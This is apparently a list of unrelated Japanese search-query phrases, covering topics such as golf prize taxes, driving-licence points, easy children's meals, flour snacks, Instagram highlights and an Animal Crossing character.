賞金 税金 ゴルフ, 免許 点数 初心者, 警察 階級 ドラマ, 子供が喜ぶ 簡単 ご飯, アマゾン Cm 最新 新生活, 小麦粉 即席 おやつ, インスタ ハイライト 勝手に消える, あつ森 チャス 英語, 万代 西 神 中央 コロナ,